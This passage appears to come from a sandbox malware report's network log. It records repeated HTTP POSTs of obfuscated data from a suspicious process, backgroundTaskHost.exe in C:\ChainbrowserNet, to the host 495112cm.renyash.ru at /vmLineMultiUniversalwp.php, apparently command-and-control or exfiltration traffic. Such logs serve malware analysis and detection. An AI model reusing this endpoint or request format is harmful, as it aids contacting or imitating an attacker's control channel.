                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:04.717119932 CET2520OUTData Raw: 51 5b 5b 54 55 5a 5f 51 5c 5b 52 58 57 5f 58 5d 58 51 5a 5b 52 52 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q[[TUZ_Q\[RXW_X]XQZ[RRQ_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.E*+ +5P1U'Y(/&!:04)<;]+#[:Z)+!Y#!Y,2
                                                                                          Jan 4, 2025 11:08:04.807271004 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:05.065165043 CET801INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:05 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GuUwaMaGGN8DDKVP4N1lV1UH7Gfuvuwf5Jrjfqk3QQxIU3Jyv9DQ1aiZ6zlGvtXUS46vLAspUeA0paxgJaVGpa6Owh%2FO4V6MKxy7mCAyUqlzkkbs1unzEBTRRVQCGNSZc54z8fmr"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cddce6b0cba-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1896&min_rtt=1701&rtt_var=1028&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=447303&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          24192.168.2.449804104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:05.280210972 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:05.639024973 CET2520OUTData Raw: 54 58 5e 51 55 5f 5a 5c 5c 5b 52 58 57 5d 58 5e 58 5c 5a 52 52 53 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TX^QU_Z\\[RXW]X^X\ZRRSQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z->@#)T2#=%Y"93.4.*S((5#Z =)!Y#!Y,
                                                                                          Jan 4, 2025 11:08:05.739275932 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:06.003534079 CET811INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:05 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1yCfOkQfiI6bV%2FPZphvza%2BAWpEtrRCPNG2h36bsQxPypL06kKtY9bO6GsIeEq2b05n%2FhC9n0pZ%2Bt6poAYlTLdLuyAJo0yURXqrm9l1S2Tm6a59DtYW7ctQek9Ch%2F%2BsFWxUzRMkGM"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ce398a84408-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7580&min_rtt=1624&rtt_var=12521&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=29630&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          25192.168.2.449810104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:06.131302118 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:06.482825994 CET2520OUTData Raw: 54 58 5b 52 55 5b 5f 54 5c 5b 52 58 57 5c 58 52 58 55 5a 58 52 5d 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TX[RU[_T\[RXW\XRXUZXR]QV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.C)/A#P%0+X=<!-'.Q X=+Z3_(+Z#>&Z=;!Y#!Y,>
                                                                                          Jan 4, 2025 11:08:06.587717056 CET25INHTTP/1.1 100 Continue


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          26192.168.2.449816104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:06.848189116 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:07.201652050 CET1844OUTData Raw: 51 59 5b 52 55 5f 5f 50 5c 5b 52 58 57 59 58 59 58 54 5a 5a 52 57 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QY[RU__P\[RXWYXYXTZZRWQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*:7A#1T'0#*!"=!0>;Q#X:W<?'<4.>!Y#!Y,*
                                                                                          Jan 4, 2025 11:08:07.292663097 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:07.558366060 CET956INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:07 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SNY7McNDjg37rp9dnszCztpE%2BadFeDytxbGEA7feSO%2Fty6TSCci%2BqlIyh0utjSvcNhFSAmmUBiUhDI2R63RdBrgkOOcCgFPwtBug%2FlGr8rakFfVJ4hqHiY254ZpLBRbQOYFdohAd"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ced4bb08c5d-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2212&min_rtt=1966&rtt_var=1230&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=370652&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 24 1f 2b 3e 30 55 21 3f 28 11 3d 10 22 12 26 1e 2c 1c 2f 0f 23 5e 20 3c 27 59 2e 32 32 02 24 33 01 07 3e 2c 24 1c 37 1e 0e 08 24 30 2a 5d 06 12 38 5f 2b 2c 3d 01 32 02 32 57 28 31 26 45 30 08 03 03 27 2e 33 10 2b 02 0b 5a 32 02 29 57 3e 2c 3d 07 3a 29 3b 1f 3b 12 30 12 22 39 21 53 08 13 23 0c 25 1f 24 0c 2a 30 36 05 26 0a 39 10 26 3a 37 12 3e 06 27 08 27 10 3e 5d 2e 57 20 04 3c 20 20 5a 2e 2d 2c 16 3e 3d 23 55 27 3c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98$+>0U!?(="&,/#^ <'Y.22$3>,$7$0*]8_+,=22W(1&E0'.3+Z2)W>,=:);;0"9!S#%$*06&9&:7>''>].W < Z.-,>=#U'<"\ #V=WL0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          27192.168.2.449818104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:06.973879099 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:07.326549053 CET2520OUTData Raw: 54 5d 5e 54 55 5d 5f 57 5c 5b 52 58 57 5b 58 5c 58 54 5a 52 52 50 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T]^TU]_W\[RXW[X\XTZRRPQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.C*_#E 8*&0?(,"-*&>7Q ="Q<?<(@4"-=!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:07.449301004 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:07.624203920 CET808INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:07 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0sHa%2Fg4unkdzkbyT5Pl1CZmt0vkIlpm39M7xUxUhsK%2ByO5jJ%2FfHNI4Au3aNRWTzQHZnFWewM%2Fa5f2inbS3PutfXEe1Vm64FVGofm8Z90dVMR84z6cqcNONrCN72cpiJ%2FRzLonN4X"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cee399a433a-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3598&min_rtt=2116&rtt_var=3758&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=104457&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          28192.168.2.449825104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:07.763535023 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:08.107796907 CET2520OUTData Raw: 54 59 5b 50 50 5b 5a 51 5c 5b 52 58 57 5b 58 53 58 54 5a 5c 52 53 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TY[PP[ZQ\[RXW[XSXTZ\RSQ_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*A";&'#*Z:6!\'?W#>R(</*&34[*;!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:08.207844019 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:08.477519989 CET802INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:08 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LRtFrmDuEaFp5I6XMqHBiGOsXtB3rBOFCq6vRbdcx%2FwbiycAmfxFOJZWzhyAYuegWNAN3o3swCKSLN32k28MakDMXQpchxBMRN2u9cD3PSL%2FNcg0HVCYsKQVKE5hbK73XMrMWZaP"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cf308ef43a9-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3380&min_rtt=1706&rtt_var=3988&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=96682&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          29192.168.2.449831104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:08.642086983 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:08.998424053 CET2520OUTData Raw: 54 50 5e 53 55 52 5a 52 5c 5b 52 58 57 5b 58 5b 58 50 5a 52 52 50 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TP^SURZR\[RXW[X[XPZRRPQ\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.>9, 21+Y>-!*3.<7X&V)</\(6##==++!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:09.102413893 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:09.373985052 CET809INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:09 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TBgBt95lpUoOmUo3ny5sbcjVAiqrr12qAUHMf9BG%2FmA2qSH4SCeLlJh1JMgxsONs7hwqDFAZQ7FJz%2BVXvhPb21OBhnkKIPGbNlxvxSdrLbDZhntVytKxJgVp%2FoN2i6E%2FIazR7%2F0Y"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cf899e1429b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3282&min_rtt=1691&rtt_var=3817&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=101213&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          30192.168.2.449836104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:09.505786896 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:09.857773066 CET2520OUTData Raw: 51 5a 5e 5f 50 5b 5a 52 5c 5b 52 58 57 53 58 5b 58 51 5a 5b 52 5d 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ^_P[ZR\[RXWSX[XQZ[R]QW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.=*# +9Q% 7]>-X"=!Y&>?R W+,0< 4)+!Y#!Y,
                                                                                          Jan 4, 2025 11:08:09.965820074 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:10.229866982 CET806INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:10 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xlNP2Ob5tgd4tbHr5cTm2yzPXy%2BKIV1OcErJhkFPcv0vUbhWnpEIk49zLNku2HlcmvCj%2B2mm%2FSUUSw%2Fk2vviIwCy5iTlB2AjMqxSUQfjhKF3hEfutNS9X3B5ilLkgd8gYz1gaHDV"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cfdfa9e43e7-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5191&min_rtt=2172&rtt_var=6853&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=55454&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          31192.168.2.449841104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:10.369998932 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:10.717325926 CET2520OUTData Raw: 54 5a 5b 57 55 58 5a 5c 5c 5b 52 58 57 5d 58 52 58 50 5a 59 52 52 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ[WUXZ\\[RXW]XRXPZYRRQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-)*4 ;!%<*5]5>6$+R#:P?,+#]#=*;!Y#!Y,
                                                                                          Jan 4, 2025 11:08:10.813812017 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:11.093246937 CET808INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:11 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CFGQH3yvFSZ2vfu%2B3cJSQzUc%2FE8pZSJlGgUPShBOQXF1I57pK1cNz3ZEgM9nWTVr5TLXNULz9LQ3yQzQOpHtUV3nENk1uWa%2B5ln9DprG5%2BaMBaZhVvdPHtIySHAXKPeQ%2FZ24K1sY"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d034b48438d-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3867&min_rtt=1743&rtt_var=4903&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=77908&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          32192.168.2.449849104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:11.327378035 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:11.686954975 CET2520OUTData Raw: 51 59 5e 5e 55 52 5a 5c 5c 5b 52 58 57 5f 58 52 58 5c 5a 5a 52 56 51 5b 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QY^^URZ\\[RXW_XRX\ZZRVQ[^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.B()# 8&1U?X)26=0!=%(#?$"==+;!Y#!Y,2
                                                                                          Jan 4, 2025 11:08:11.781033039 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:12.048676968 CET803INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:12 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZCMyGDAVX%2FdkitobNUE2FPDAfI3edNd3iKBSlADFh5nnUnCNVrdxuJSq3MBbRyLmcWrfU8iMkcQ2TK9natRIDJygQaiqjTZmlQNii0KG0hEdsIr0fLxFb5gbQdOysJ%2ByY40ukZZn"}],"group":"cf-nel","max_age":604800}
